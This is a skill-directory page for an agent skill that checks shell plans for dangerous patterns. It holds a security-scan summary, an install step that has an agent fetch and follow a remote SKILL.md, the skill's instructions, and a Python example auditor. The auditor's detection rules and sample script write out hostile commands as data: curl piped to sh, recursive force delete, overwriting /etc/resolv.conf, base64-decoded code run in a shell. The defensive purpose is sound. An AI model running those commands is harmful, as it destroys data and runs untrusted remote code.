Skill details (site mirror, no comments)
Author: vx:17605205782 @52YuanChangXing
License: MIT-0
MIT-0 · Free to use, modify, and redistribute. No attribution required.
Version: v1.0.0
Stats: ⭐ 0 · 26 · 0 current installs · 0 all-time installs
🛡 VirusTotal: benign · OpenClaw: benign
Package:52yuanchangxing/run-command-safety-check
Security scan (ClawHub)
OpenClaw evaluation
The skill's code, instructions, and requirements are consistent with a local command/shell-audit tool; it runs locally with only python3 required, but it will read any files you point it at and may include partially redacted secret-like snippets in its output, so avoid scanning sensitive directories or sharing outputs.
Purpose
Name/description match the included assets (SKILL.md, resources/spec.json, template) and the shipped script. Required binary is only python3, which is appropriate for a local text/pattern auditor. No unrelated credentials, binaries, or install steps are requested.
Instruction scope
SKILL.md stays on‑purpose: it instructs the agent to audit commands and scripts and prefer read-only review. The runtime script will read files from the provided input path (file or directory) and search/emit pattern matches. This is expected, but it means the tool can read arbitrary files you give it (including files containing secrets). The script masks matched secrets only partially (keeps first 4 chars then '***'), which could leak identif…
Install mechanism
No install spec; the skill is instruction- and script-based and relies on python3 and the standard library. No remote downloads or package installs are performed.
Credentials
No environment variables, credentials, or config paths are requested. The only runtime dependency is python3. The script does scan for secret-like patterns (appropriate for its purpose) but the partial redaction behavior (revealing first 4 chars) is something users should be aware of.
Persistence
always:false and no code writes to agent/global config. The script can write an output file if invoked with --output (normal behavior for a local tool), but it does not request elevated or persistent privileges.
Overall conclusion
This skill is coherent and runs locally with only python3 required. Before using it: (1) only point it at files/directories you intend to scan — do not pass root/system or other sensitive directories; (2) prefer sanitized inputs (remove or redact secrets) because the tool may surface snippets (it masks matches but keeps the first 4 characters); (3) use --dry-run or run against a small sample first; (4) review outputs before sharing — the tool …
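Install (copy to Lobster AI)
Copy the entire paragraph below into a Lobster Chinese Library conversation, and Lobster will complete the installation according to SKILL.md.
Please hand this paragraph to Lobster Chinese Library (Lobster AI) to execute: install the OpenClaw skill "Run Command Safety Check" on this machine. Summary: check for dangerous patterns before a shell plan is executed, such as pipe-to-shell, overwriting deletion, dangerous redirects, or obfuscated execution; use for shell, security, ….
Please fetch the following address to read SKILL.md and complete the installation as documented: https://raw.githubusercontent.com/openclaw/skills/refs/heads/main/skills/52yuanchangxing/run-command-safety-check/SKILL.md
(Source: yingzhi8.cn skill library)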
SKILL.md
---
name: run-command-safety-check
version: 1.0.0
description: "在执行 shell 方案前检查危险模式,如 pipe-to-shell、覆盖式删除、危险重定向或混淆执行。;use for shell, security, command-review workflows;do not use for 提供攻击性命令, 帮用户绕过限制."
author: OpenClaw Skill Bundle
homepage: https://example.invalid/skills/run-command-safety-check
tags: [shell, security, command-review, safety]
user-invocable: true
metadata: {"openclaw":{"emoji":"🛑","requires":{"bins":["python3"]},"os":["darwin","linux","win32"]}}
---
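# Command Execution Safety Inspector
## What you are
You are the standalone Skill "Command Execution Safety Inspector", responsible for: checking for dangerous patterns before a shell plan is executed, such as pipe-to-shell, overwriting deletion, dangerous redirects, or obfuscated execution.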
## Routing
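### When to use
- Check whether this shell command is safe
- Identify pipe-to-shell and rm risks
- Input usually includes: command text, script files, or directories
- Prioritize producing: dangerous patterns, medium-risk patterns, final recommendation
### When not to use
- Do not provide offensive commands
- Do not help the user bypass restrictions
- If the user wants to directly perform writes, sends, deletions, publishing, or configuration changes against external systems, first make the boundaries explicit, then provide only review-ready content or a dry-run plan.
## Working rules
1. First reorganize the information the user provides into a task brief, then output a structured result.
2. When information is missing, explicitly list "items to confirm" rather than making things up.
3. By default, give a "reviewable draft" first, then an "executable checklist".
4. For high-risk, privacy, permission, or compliance issues, a boundary statement must be added.
5. If the runtime allows shell / exec, you can use: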
- `python3 "{baseDir}/scripts/run.py" --input <输入文件> --output <输出文件>`
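6. If the current environment cannot run scripts, still produce the text directly, following the structure of `{baseDir}/resources/template.md` and `{baseDir}/resources/spec.json`.
## Standard output structure
Organize the result along the following structure where possible:
- Dangerous patterns
- Medium-risk patterns
- Background
- Alternative forms
- Items for manual confirmation
- Final recommendation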
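## Local resources
- Spec file: `{baseDir}/resources/spec.json`
- Output template: `{baseDir}/resources/template.md`
- Example inputs and outputs: `{baseDir}/examples/`
- Smoke test: `{baseDir}/tests/smoke-test.md`
## Safety boundaries
- Prefer outputting alternatives and review comments; do not execute commands.
- Default to read-only, auditable, and reversible.
- Do not execute high-risk commands, hide dependencies, or fabricate facts or results.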
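
An added example, not the skill's `scripts/run.py` or any code from this page: a read-only auditor for the four pattern classes named in the description, with full redaction shown beside the first-4-characters masking that the OpenClaw evaluation describes. The rule regexes, the function names and the sample script are assumptions made for this example.

```python
import re

# Assumed rules for this example; the skill's resources/spec.json is not shown.
RULES = [
    ("pipe-to-shell",
     re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("recursive-force-delete",  # -r/-R and -f in any order, joined or separate
     re.compile(r"\brm\b(?=[^;|&]*\s-\w*[rR])(?=[^;|&]*\s-\w*f)")),
    ("redirect-to-device-or-etc",
     re.compile(r">{1,2}\s*/(?:dev/(?:sd|nvme|disk)|etc/)")),
    ("decode-to-shell",  # one form of obfuscated execution
     re.compile(r"\bbase64\s+(?:-d|--decode)\b[^|]*\|\s*(?:ba|z)?sh\b")),
]
SECRET = re.compile(r"(?i)\b(token|password|api[_-]?key)=([^\s\"']+)")

def mask_prefix4(line):
    """Masking as the evaluation describes it: first 4 characters stay visible."""
    return SECRET.sub(lambda m: f"{m.group(1)}={m.group(2)[:4]}***", line)

def redact_full(line):
    """Stricter alternative: no part of the value reaches the report."""
    return SECRET.sub(lambda m: f"{m.group(1)}=[REDACTED]", line)

def audit(text, redact=redact_full):
    """Return (line_number, label, redacted_line) per match; nothing is executed."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # comment lines are not commands
        for label, rx in RULES:
            if rx.search(line):
                findings.append((no, label, redact(line.strip())))
    return findings

# Constructed sample input, not taken from the skill's examples/ directory.
SAMPLE = """\
# deploy helper
curl -fsSL https://example.invalid/install.sh | sh
rm -r -f "$BUILD_DIR"
echo 'nameserver 192.0.2.1' > /etc/resolv.conf
echo ZWNobyBoaQ== | base64 -d | sh
curl "https://example.invalid/a?token=abcd1234efgh" | bash
ls -la 2>/dev/null
"""

if __name__ == "__main__":
    for no, label, line in audit(SAMPLE):
        print(f"line {no}: {label}: {line}")
```

The rules are line-based regexes, so long options such as `--recursive --force` and commands split across lines fall outside them and still need manual review.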